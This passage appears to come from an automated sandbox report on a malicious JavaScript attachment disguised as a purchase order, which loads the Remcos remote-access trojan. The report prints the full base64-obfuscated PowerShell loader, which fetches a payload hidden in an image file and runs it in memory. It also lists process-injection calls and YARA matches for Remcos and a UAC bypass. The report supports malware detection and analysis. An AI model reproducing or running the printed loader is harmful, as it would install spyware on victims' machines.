EIAQQBTAEUANgA0AF8ARQBOAEQAPgA+ACcAOwAkAHcAYQBsAGwAZQBkACAAPQAgACQAZQBkAC4ASQBuAGQAZQB4AE8AZgAoACQAcgBlAHMAZQBuAHQAaQB2AGUAKQA7ACQAaABpAGcAaABsAGkAZwBoAHQAZQBkACAAPQAgACQAZQBkAC4ASQBuAGQAZQB4AE8AZgAoACQAbwB2AGUAcgBwAGEAYwBrACkAOwAkAHcAYQBsAGwAZQBkACAALQBnAGUAIAAwACAALQBhAG4AZAAgACQAaABpAGcAaABsAGkAZwBoAHQAZQBkACAALQBnAHQAIAAkAHcAYQBsAGwAZQBkADsAJAB3AGEAbABsAGUAZAAgACsAPQAgACQAcgBlAHMAZQBuAHQAaQB2AGUALgBMAGUAbgBnAHQAaAA7ACQAbABlAGcAYQB0AGkAbgBlACAAPQAgACQAaABpAGcAaABsAGkAZwBoAHQAZQBkACAALQAgACQAdwBhAGwAbABlAGQAOwAkAG0AZQB0AGUAbwByAGkAdABpAGMAIAA9ACAAJABlAGQALgBTAHUAYgBzAHQAcgBpAG4AZwAoACQAdwBhAGwAbABlAGQALAAgACQAbABlAGcAYQB0AGkAbgBlACkAOwAkAG8AcgBjAGEAcwAgAD0AIAAtAGoAbwBpAG4AIAAoACQAbQBlAHQAZQBvAHIAaQB0AGkAYwAuAFQAbwBDAGgAYQByAEEAcgByAGEAeQAoACkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAgACQAXwAgAH0AKQBbAC0AMQAuAC4ALQAoACQAbQBlAHQAZQBvAHIAaQB0AGkAYwAuAEwAZQBuAGcAdABoACkAXQA7ACQAcABlAHIAdgBhAHMAaQB2AGUAbgBlAHMAcwBlAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAbwByAGMAYQBzACkAOwAkAHMAeQBuAGkAegBlAHMAaQBzACAAPQAgAFsAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQB
                      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $forsakers = 'aQBmACAAKAAkAG4AdQBsAGwAIAAtAG4AZQAgACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlACAALQBhAG4AZAAgACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlAC4AUABTAFYAZQByAHMAaQBvAG4AIAAtAG4AZQAgACQAbgB1AGwAbAApACAAewAgAFsAdgBvAGkAZABdACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlAC4AUABTAFYAZQByAHMAaQBvAG4AIAB9ACAAZQBsAHMAZQAgAHsAIABXAHIAaQB0AGUALQBPAHUAdABwAHUAdAAgACcAUABvAHcAZQByAFMAaABlAGwAbAAgAHYAZQByAHMAaQBvAG4AIABOAG8AdAAgAGEAdgBhAGkAbABhAGIAbABlACcAIAB9ADsAaQBmACAAKAAkAG4AdQBsAGwAIAAtAG4AZQAgACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlACAALQBhAG4AZAAgACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlAC4AUABTAFYAZQByAHMAaQBvAG4AIAAtAG4AZQAgACQAbgB1AGwAbAApACAAewAgAFsAdgBvAGkAZABdACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlAC4AUABTAFYAZQByAHMAaQBvAG4AIAB9ACAAZQBsAHMAZQAgAHsAIABXAHIAaQB0AGUALQBPAHUAdABwAHUAdAAgACcAUABvAHcAZQByAFMAaABlAGwAbAAgAHYAZQByAHMAaQBvAG4AIABOAG8AdAAgAGEAdgBhAGkAbABhAGIAbABlACcAIAB9ADsAJABtAGUAbQBvAHIAYQBuAGQAdQBtAHMAIAA9ACAAJwBoAHQAdABwAHMAOgAvAC8AcgBlAHMALgBjAGwAbwB1AGQAaQBuAGEAcgB5AC4AYwBvAG0ALwBkAHkAdABmAGwAdAA2ADEAbgAvAGkAbQBhAGcAZQAvAHUAcABsAG8AYQBkAC8AdgAxADcAMwAzADEAMwA0ADkANAA3AC8AYgBrAGwAcAB5AHMAZQB5AGUAdQB0ADQAaQBtAHAAdwA1ADAAbgAxAC4AagBwAGcAIAAnADsAJABjAG8AbgBlAG4AbwBzAGUAcwAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJABpAG0AbQBlAG0AbwByAGkAYQBsAGwAeQAgAD0AIAAkAGMAbwBuAGUAbgBvAHMAZQBzAC4ARABvAHcAbgBsAG8AYQBkAEQAYQB0AGEAKAAkAG0AZQBtAG8AcgBhAG4AZAB1AG0AcwApADsAJABlAGQAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABpAG0AbQBlAG0AbwByAGkAYQBsAGwAeQApADsAJAByAGUAcwBlAG4AdABpAHYAZQAgAD0AIAAnADwAPABCAEEAUwBFADYANABfAFMAVABBAFIAVAA+AD4AJwA7ACQAbwB2AGUAcgBwAGEAYwBrACAAPQAgACcAPAA8AEIAQQBTAEUANgA0AF8ARQBOAEQAPgA+ACcAOwAkAHcAYQBsAGwAZQBkACAAPQAgACQAZQBkAC4ASQBuAGQAZQB4AE8AZgAoACQAcgBlAHMAZQBuAHQAaQB2AGUAKQA7ACQAaABpAGcAaABsAGkAZwBoAHQAZQBkACAAPQAgACQAZQBkAC4ASQBuAGQAZQB4AE8AZgAoACQAbwB2AGUAcgBwAGEAYwBrACkAOwAkAHcAYQBsAGwAZQBkACAALQBnAGUAIAAwACAALQBhAG4AZAAgACQAaABpAGcAaABsAGkAZwBoAHQAZQBkACAALQBnAHQAIAAkAHcAYQBsAGwAZQBkADsAJAB3AGEAbABsAGUAZAAgACsAPQAgACQAcgBlAHMAZQBuAHQAaQB2AGUALgBMAGUAbgBnAHQAaAA7ACQAbABlAGcAYQB0AGkAbgBlACAAPQAgACQAaABpAGcAaABsAGkAZwBoAHQAZQBkACAALQAgACQAdwBhAGwAbABlAGQAOwAkAG0AZQB0AGUAbwByAGkAdABpAGMAIAA9ACAAJABlAGQALgBTAHUAYgBzAHQAcgBpAG4AZwAoACQAdwBhAGwAbABlAGQALAAgACQAbABlAGcAYQB0AGkAbgBlACkAOwAkAG8AcgBjAGEAcwAgAD0AIAAtAGoAbwBpAG4AIAAoACQAbQBlAHQAZQBvAHIAaQB0AGkAYwAuAFQAbwBDAGgAYQByAEEAcgByAGEAeQAoACkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAgACQAXwAgAH0AKQBbAC0AMQAuAC4ALQAoACQAbQBlAHQAZQBvAHIAaQB0AGkAYwAuAEwAZQBuAGcAdABoACkAXQA7ACQAcABlAHIAdgBhAHMAaQB2AGUAbgBlAHMAcwBlAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAbwByAGMAYQBzACkAOwAkAHMAeQBuAGkAegBlAHMAaQBzACAAPQAgAFsAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess Stats: CPU usage > 49%
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_00417245 GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,CreateProcessW,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtCreateSection,NtUnmapViewOfSection,NtMapViewOfSection,VirtualFree,NtClose,TerminateProcess,GetCurrentProcess,NtMapViewOfSection,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,VirtualFree,GetCurrentProcess,NtUnmapViewOfSection,NtClose,TerminateProcess,GetLastError,10_2_00417245
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_0041ACC1 OpenProcess,NtSuspendProcess,CloseHandle,10_2_0041ACC1
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_0041ACED OpenProcess,NtResumeProcess,CloseHandle,10_2_0041ACED
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 11_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,11_2_0040DD85
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 11_2_00401806 NtdllDefWindowProc_W,11_2_00401806
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 11_2_004018C0 NtdllDefWindowProc_W,11_2_004018C0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_004016FD NtdllDefWindowProc_A,12_2_004016FD
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_004017B7 NtdllDefWindowProc_A,12_2_004017B7
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_00402CAC NtdllDefWindowProc_A,13_2_00402CAC
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_00402D66 NtdllDefWindowProc_A,13_2_00402D66
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_004158B9 ExitWindowsEx,LoadLibraryA,GetProcAddress,10_2_004158B9
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_0041D07110_2_0041D071
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_004520D210_2_004520D2
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_0043D09810_2_0043D098
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_0043715010_2_00437150
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_004361AA10_2_004361AA
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_0042625410_2_00426254
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_0043137710_2_00431377
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_0043651C10_2_0043651C
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_0041E5DF10_2_0041E5DF
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_0044C73910_2_0044C739
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_004367C610_2_004367C6
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_004267CB10_2_004267CB
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_0043C9DD10_2_0043C9DD
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_00432A4910_2_00432A49
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_00436A8D10_2_00436A8D
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_0043CC0C10_2_0043CC0C
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_00436D4810_2_00436D48
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_00434D2210_2_00434D22
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_00426E7310_2_00426E73
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_00440E2010_2_00440E20
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_0043CE3B10_2_0043CE3B
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_00412F4510_2_00412F45
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_00452F0010_2_00452F00
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_00426FAD10_2_00426FAD
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_1001719410_2_10017194
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_1000B5C110_2_1000B5C1
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 11_2_0044B04011_2_0044B040
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 11_2_0043610D11_2_0043610D
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 11_2_0044731011_2_00447310
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 11_2_0044A49011_2_0044A490
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 11_2_0040755A11_2_0040755A
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 11_2_0043C56011_2_0043C560
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 11_2_0044B61011_2_0044B610
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 11_2_0044D6C011_2_0044D6C0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 11_2_004476F011_2_004476F0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 11_2_0044B87011_2_0044B870
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 11_2_0044081D11_2_0044081D
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 11_2_0041495711_2_00414957
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 11_2_004079EE11_2_004079EE
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 11_2_00407AEB11_2_00407AEB
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 11_2_0044AA8011_2_0044AA80
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 11_2_00412AA911_2_00412AA9
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 11_2_00404B7411_2_00404B74
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 11_2_00404B0311_2_00404B03
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 11_2_0044BBD811_2_0044BBD8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 11_2_00404BE511_2_00404BE5
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 11_2_00404C7611_2_00404C76
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 11_2_00415CFE11_2_00415CFE
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 11_2_00416D7211_2_00416D72
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 11_2_00446D3011_2_00446D30
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 11_2_00446D8B11_2_00446D8B
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 11_2_00406E8F11_2_00406E8F
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_0040503812_2_00405038
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_0041208C12_2_0041208C
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_004050A912_2_004050A9
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_0040511A12_2_0040511A
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_0043C13A12_2_0043C13A
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_004051AB12_2_004051AB
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_0044930012_2_00449300
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_0040D32212_2_0040D322
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_0044A4F012_2_0044A4F0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_0043A5AB12_2_0043A5AB
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_0041363112_2_00413631
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_0044669012_2_00446690
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_0044A73012_2_0044A730
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_004398D812_2_004398D8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_004498E012_2_004498E0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_0044A88612_2_0044A886
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_0043DA0912_2_0043DA09
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_00438D5E12_2_00438D5E
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_00449ED012_2_00449ED0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_0041FE8312_2_0041FE83
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_00430F5412_2_00430F54
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_004050C213_2_004050C2
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_004014AB13_2_004014AB
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_0040513313_2_00405133
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_004051A413_2_004051A4
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_0040124613_2_00401246
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_0040CA4613_2_0040CA46
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_0040523513_2_00405235
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_004032C813_2_004032C8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_0040168913_2_00401689
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_00402F6013_2_00402F60
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: String function: 004169A7 appears 87 times
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: String function: 004165FF appears 35 times
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: String function: 00422297 appears 42 times
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: String function: 00401F66 appears 50 times
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: String function: 00433FB0 appears 55 times
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: String function: 004020E7 appears 40 times
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: String function: 0044DB70 appears 41 times
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: String function: 00444B5A appears 37 times
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: String function: 004338A5 appears 41 times
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: String function: 00413025 appears 79 times
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: String function: 00416760 appears 69 times
                      Source: PO_0099822111ORDER.jsInitial sample: Strings found which are bigger than 50
                      Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 4827
                      Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 4827Jump to behavior
                      Source: 10.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 10.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                      Source: 10.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 10.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 10.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                      Source: 10.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                      Source: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: Process Memory Space: powershell.exe PID: 7116, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                      Source: Process Memory Space: powershell.exe PID: 6372, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                      Source: Process Memory Space: MSBuild.exe PID: 7040, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: classification engineClassification label: mal100.rans.spre.phis.troj.spyw.expl.evad.winJS@18/12@3/4
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 11_2_004182CE GetLastError,FormatMessageW,FormatMessageA,LocalFree,free,11_2_004182CE
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_00416AB7 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,10_2_00416AB7
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_00410DE1 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueA,GetProcAddress,AdjustTokenPrivileges,CloseHandle,13_2_00410DE1
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 11_2_00418758 GetDiskFreeSpaceW,GetDiskFreeSpaceA,free,11_2_00418758
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_0040E219 GetModuleFileNameW,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,CloseHandle,10_2_0040E219
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_0041A63F FindResourceA,LoadResource,LockResource,SizeofResource,10_2_0041A63F
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_00419BC4 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,10_2_00419BC4
                      Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZRZDXR93\uploaded_textfile[1]Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7124:120:WilError_03
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMutant created: \Sessions\1\BaseNamedObjects\Rmc-QM0FWK
                      Source: C:\Windows\System32\wscript.exeFile created: C:\Windows\Temp\???2????4????4????5.jsJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSystem information queried: HandleInformationJump to behavior
                      Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
